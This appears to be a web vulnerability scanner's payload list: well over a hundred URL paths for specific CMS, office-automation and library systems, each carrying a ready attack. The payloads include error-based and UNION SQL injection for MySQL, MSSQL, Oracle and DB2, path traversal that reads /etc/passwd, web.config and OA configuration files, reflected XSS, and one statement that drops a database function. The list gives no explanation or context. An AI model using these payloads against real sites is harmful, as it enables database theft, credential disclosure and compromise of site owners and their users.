/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
/news/js.php?type=like&keyword=1%2527)/**/and/**/(select/**/1/**/from/**//**/(select/**/count(*),concat((select/**/concat(0x7e,0x7765627363616E3A693A66696E64,0x7e)/**/from/**/1tc_members/**/limit/**/0,1),floor(rand(0)*2))x/**/from/**//**/information_schema.tables/**/group/**/by/**/x)a)%23
/mod/payment/quest.php?op=check&page=b2b
/mod/ntga/jwsview.php
/uploadd.php
/jserr.php?jsstr=%3Cimg%20src=@%20onerror=alert(42873)%20/%3E
/admin/backup.aspx
/mod/mad/video_upload.php
/business/buildingrooms_xml.asp?cancelBldroomShow=2&client_buildID=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)&client_mainno=0&client_mainTable=unrelatedresource&client_realtypeID=-1&client_showMode=&client_showRoomCond=&client_stanID=1610&floorEnd=-100&floorStart=-100&functiontype=6&pmBldRoomID=undefined&roomNoEnd=-100&roomNoStart=-100&sid=
/SelNews.aspx?NewsType=DongTaiNewsType=1'%20and%201=char(106)%20--
/Website/OnlineSurveyResults.jsp?idhao=1'%20union%20all%20select%20null,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%7C%7Cchr(60)%20from%20sysibm.sysdummy1--
/frontProduct/search.ac
/Website/contentshow.jsp?ColumnCode=-12'%20union%20all%20select%20CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)%20from%20DUAL%20--
/Website/newsshow.jsp?id=-12%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL%20FROM%20DUAL
/FileManages/NetworkDisk/QxSet1.aspx?id=38%20%20and+1=char(106)+--
/website/approve/convenientSiteAction!getSXList.action?department=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&mill=488&style=4
/website/approve/approveSiteAction!listApproveModel.action?action=search&forward=searchmodel&issueTypename=&style=4&subType=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/website/approve/approveSiteAction!findApproveGuide.action?businesscode=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&location=&subcode=000
/bookdetail.aspx?id=-311%20union%20all%20Select%208%2CCHAR%28119%29%2bCHAR%28101%29%2bCHAR%2898%29%2bCHAR%28115%29%2bCHAR%2899%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%28102%29%2bCHAR%28105%29%2bCHAR%28110%29%2bCHAR%28100%29%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8%2C8--
/znSearchAction.do?searchContext=-1%25%27%20UNION%20%20ALL%20SELECT%20%20NULL%2CNULL%2CCHR%28119%29%7C%7CCHR%28101%29%7C%7CCHR%2898%29%7C%7CCHR%28115%29%7C%7CCHR%2899%29%7C%7CCHR%2897%29%7C%7CCHR%28110%29%7C%7CCHR%2858%29%7C%7CCHR%28105%29%7C%7CCHR%2858%29%7C%7CCHR%28102%29%7C%7CCHR%28105%29%7C%7CCHR%28110%29%7C%7CCHR%28100%29%2CNULL%20FROM%20DUAL%20--
/opac/ckgc.jsp?kzh=-1')%20UNION%20%20ALL%20SELECT%20%20NULL,NULL,CHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7CCHR(105)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/cms/framework/dbfile/createdbfile.jsp
/CN/item/downloadFile.jsp?filedisplay=../../web-inf/web.xml
/servlet/com.runqian.base.util.ReadJavaScriptServlet?file=../../../../../../../../../../etc/passwd
/FileManages/FolderQxSet/FileModify.aspx?type=2&fileid=3%20and+1=char(106)%20--&path=/1
/interface/ugo.php?OA_USER=aa%2527%20and%201=(select%201%20from(select%20count(*),concat(0x7c,0x484B3A693A31393937,0x7c,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1)a)%20and%20%25271%2527=%25271
/inc/finger/use_finger.php?USER_ID=-123%bf'%20and%20extractvalue(1,%20concat(0x5c,(select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201)))%23
/general/ems/query/search_excel.php?LOGIN_USER_ID=1%bf%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23&EMS_TYPE=1
/general/ems/manage/search_excel.php?LOGIN_USER_ID=1&EMS_TYPE=1%e5%27%20and%20extractvalue%281,%20concat%280x5c,%28select%200x5468696E6B3A693A646966666572656E74%20from%20%60user%60%20limit%201%29%29%29;%23
/backup/backup/backup.asp
/module/AIP/get_file.php?MODULE=/&ATTACHMENT_ID=.._webroot/inc/oa_config&ATTACHMENT_NAME=php
/general/mytable/intel_view/video_file.php?MEDIA_DIR=../../../inc/&MEDIA_NAME=oa_config.php
/admini/item/iteminfo.aspx
/admini/newstopic/newstopicinfo.aspx
/download?fileName=/WEB-INF/web.xml
/RecruitstuManage/schoolinfo/DetailTheme.aspx?type=-1&topicid=1'%20and%201=char(106)%20--
/index_lnlqcj.php
/main/model/childcatalog/fileFind.do?fcode=00103&title=-111%25%27%20union%20all%20select%20null%2CCHAR%2884%29%2bCHAR%2897%29%2bCHAR%28105%29%2bCHAR%2887%29%2bCHAR%2897%29%2bCHAR%28110%29%2bCHAR%2858%29%2bCHAR%28103%29%2bCHAR%28111%29%2bCHAR%2858%29%2bCHAR%28104%29%2bCHAR%28111%29%2bCHAR%28109%29%2bCHAR%28101%29%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--&Submit=%CB%D1%CB%F7
/scrp/feedbackdetail.cfm?iSno=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(104)%7C%7CCHR(107)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55)))%20FROM%20DUAL)
